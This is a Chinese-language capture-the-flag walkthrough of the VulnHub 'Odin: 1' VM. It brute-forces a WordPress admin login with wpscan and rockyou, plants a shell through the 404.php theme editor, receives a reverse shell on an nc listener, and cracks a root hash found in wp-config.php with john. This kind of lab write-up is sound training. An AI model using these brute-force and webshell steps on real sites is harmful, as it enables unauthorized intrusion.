Odin 1
作者:jason_huawen
目标主机基本信息
名称:Odin: 1
地址:
https://www.vulnhub.com/entry/odin-1,619/
提示:
add /etc/hosts -> ip vm + odin
example: 192.168.1.1 odin
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:be:bb:0d 1 60 PCS Systemtechnik GmbH
192.168.56.232 08:00:27:49:5a:73 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.232
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.232 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 21:53 EST
Nmap scan report for bogon (192.168.56.232)
Host is up (0.00027s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: vikingarmy – Just another Joomla site
|_http-generator: WordPress 5.5.3
MAC Address: 08:00:27:49:5A:73 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.51 seconds
NMAP扫描结果表明目标主机有1个开放端口。
Get Access
浏览器访问80端口,返回页面源代码表明需要添加主机记录odin
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.232 odin
返回页面中有几处base64编码的信息,将其解码:
用cyberchef网站尝试不同的编码:
NB2HI4DTHIXS6Z3JORUHKYROMNXW2L3EMFXGSZLMNVUWK43TNRSXEL2TMVRUY2LTORZS6YTMN5RC
63LBON2GK4RPKBQXG43XN5ZGI4ZPJRSWC23FMQWUIYLUMFRGC43FOMXXE33DNN4W65JOOR4HILTU
MFZC4Z32EBZG6Y3LPFXXKIDONFRWKIDXN5ZGI3DJON2AU===
该编码格式为base32
解码后为:
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz rockyou nice wordlist
从这里可知,在渗透测试过程中可能会用到rockyou字典。
SWYgeW91IGxvb2sgY2xvc2VseSwgeW91IHdvbid0IG5lZWQgaXQgaGVyZQo=
编码格式为base64
解码后为:
If you look closely, you won't need it here
从页面中信息,title部分得知:CMS是Joomla,但是在底部又指出是:wordpress
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ nikto -h http://192.168.56.232
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.232
+ Target Hostname: 192.168.56.232
+ Target Port: 80
+ Start Time: 2022-11-27 22:06:30 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://odin/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php?action=register: Wordpress registration enabled
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2022-11-27 22:07:25 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
从Nikto工具的输出结果看,目标主机运行的CMS是wordpress.
接下来用wpscan扫描一下,看是否可以扫描出用户名和有漏洞的插件:
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ wpscan --url http://192.168.56.232 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.232/ [192.168.56.232]
[+] Started: Sun Nov 27 22:09:21 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.232/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] Registration is enabled: http://192.168.56.232/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.232/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.232/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.232/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.232/, Match: 'WordPress 5.5.3'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] No Users Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 27 22:09:23 2022
[+] Requests Done: 54
[+] Cached Requests: 11
[+] Data Sent: 12.229 KB
[+] Data Received: 320.63 KB
[+] Memory used: 211.102 MB
[+] Elapsed time: 00:00:02
没有识别出任何用户名和插件,但是按照wordpress规律,第一个创建post的用户是管理员,从页面里看到是odin,因此假设用户名为odin,看是否可以破解出密码:
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ wpscan --url http://192.168.56.232 -U odin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.232/ [192.168.56.232]
[+] Started: Sun Nov 27 22:10:17 2022
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
Trying odin / prettygurl Time: 00:01:38 < > (9324 / 14344392) 0.06% ETA: 41:51:47
^Cying odin / warwick Time: 00:03:55 < > (22840 / 14344392) 0.15% ETA: 41:03:15
[i] No Valid Passwords Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output. > (22845 / 14344392) 0.15% ETA: 41:04:05
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 27 22:14:16 2022
[+] Requests Done: 22993
[+] Cached Requests: 30
[+] Data Sent: 11.718 MB
[+] Data Received: 13.506 MB
[+] Memory used: 263.285 MB
[+] Elapsed time: 00:03:59
Scan Aborted: Canceled by User
竟然也没有破解出密码,那直接登录/wp-admin页面看一下看,输入odin,结果返回:
Unknown username.
可以利用这点枚举出存在的用户名,不过在用工具比如burpsuite之前,看一下常见的用户名admin是否存在,试一下,此次返回The password you entered for the username admin is incorrect,也就是我们的方向是正确的,然后用rockyou字典破解这个admin用户的密码:
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ wpscan --url http://192.168.56.232 -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.56.232/ [192.168.56.232]
[+] Started: Sun Nov 27 22:14:34 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.232/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] Registration is enabled: http://192.168.56.232/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.232/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.232/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.232/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.232/, Match: 'WordPress 5.5.3'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / qwerty
Trying admin / ashley Time: 00:00:00 < > (20 / 14344412) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: qwerty
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 27 22:14:37 2022
[+] Requests Done: 160
[+] Cached Requests: 33
[+] Data Sent: 46.632 KB
[+] Data Received: 32.735 KB
[+] Memory used: 249.203 MB
[+] Elapsed time: 00:00:03
成功破解出wordpress管理后台的用户名和密码:
username: admin
password: qwerty
登录wordpress后台,接下来看能否通过替换404.php模板,将shell.php上传至wordpress后台。
即Appearnce -> Theme Editor -> Theme Files -> 404.php,然后update file
从页面源代码:
<link rel='stylesheet' id='twentytwenty-style-css' href='http://odin/wp-content/themes/twentytwenty/style.css?ver=1.5' media='all' />
猜测404.php页面位置在:
http://odin/wp-content/themes/twentytwenty/404.php
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.232] 46286
Linux osboxes 5.4.0-26-generic #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
22:29:21 up 38 min, 0 users, load average: 0.11, 0.18, 0.44
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@osboxes:/$
在Kali Linux上成功得到了目标主机反弹回来的shell。
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.232] 46286
Linux osboxes 5.4.0-26-generic #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
22:29:21 up 38 min, 0 users, load average: 0.11, 0.18, 0.44
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@osboxes:/$ ls
ls
bin cdrom etc lib lost+found mnt proc run srv tmp var
boot dev home lib64 media opt root sbin sys usr
提权
仔细查看wp-config.php文件(后半部分),里面有root密码:
www-data@osboxes:/var/www/html$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'joomla' );
/** MySQL database username */
define( 'DB_USER', 'joomla' );
/** MySQL database password */
define( 'DB_PASSWORD', 'joomla' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'hJ6K`1Lh|p>fc/)&[~yFq~fyW|aIt/aN(t4D{f4q/j.R6[|CNgW{Jgz(,w+L#[3D' );
define( 'SECURE_AUTH_KEY', '$NY`wt7VU18-FcJC/|~c*NKy*EJ,]:6jS_ShC20hpZnUhV%+0.=-=PaM_5%shx%f' );
define( 'LOGGED_IN_KEY', 'A6R.i/vfrs*.i-e[(Elb*hD}S bV;<%bjd,!${8PRhDl+a0}X:9Y4% 6CJ,]tazm' );
define( 'NONCE_KEY', '7B01IEuF=J}ep]`k*oy]{/*L)2O=U5LVJR+YioC?|!~KGdv-b/_ |VmHF[hC: un' );
define( 'AUTH_SALT', '7#xk&!&`({X!1nF#jkWiXu$s7<{]vrl_n:n.R!9qy%@l1rDglP&HpB)G{bPdz>mV' );
define( 'SECURE_AUTH_SALT', '$KC6{ex+{<*Q:%T:U.`=YHg>`f!:fmFb@%twt2_z=P((gdUY@HgG5Mq4=q-5e$vg' );
define( 'LOGGED_IN_SALT', '6gs|sWkYAZ@?&8NkX:u< F=v^sCcd/CJ#YiI-H*^ OC/SBC6XBh?cRYN(;J3_?3=' );
define( 'NONCE_SALT', 'xA+mKYMD;]J@>tEi%MT1!<$|<5KBs1AX@C8E|y2WAE=NwR5{3:piVlWHr6JsK[6u' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
/** root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::*/
将root所在行(含密码哈希值)拷贝至Kali Linux本地进行破解(拷贝的时候要小心,不要用双引号)
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ echo 'root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::' > root_hash
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ cat root_hash
root:$6$e9hWlnuTuxApq8h6$ClVqvF9MJa424dmU96Hcm6cvevBGP1OaHbWg//71DVUF1kt7ROW160rv9oaL7uKbDr2qIGsSxMmocdudQzjb01:18600:0:99999:7:::
┌──(kali㉿kali)-[~/Vulnhub/Odin]
└─$ john root_hash /usr/share/wordlists/rockyou.txt
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
jasmine (root)
1g 0:00:00:01 DONE 2/3 (2022-11-27 22:56) 0.9345g/s 3514p/s 3514c/s 3514C/s crystal..bigben
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
成功破解了root密码.
www-data@osboxes:/var/www/html$ su - root
su - root
Password: jasmine
root@osboxes:~# cd /root
cd /root
root@osboxes:~# ls -alh
ls -alh
经验教训
- 要仔细查看关键文件,一般认为wp-config.php主要关心数据库用户名和密码,所以没有认真看完所有的信息,导致遗漏。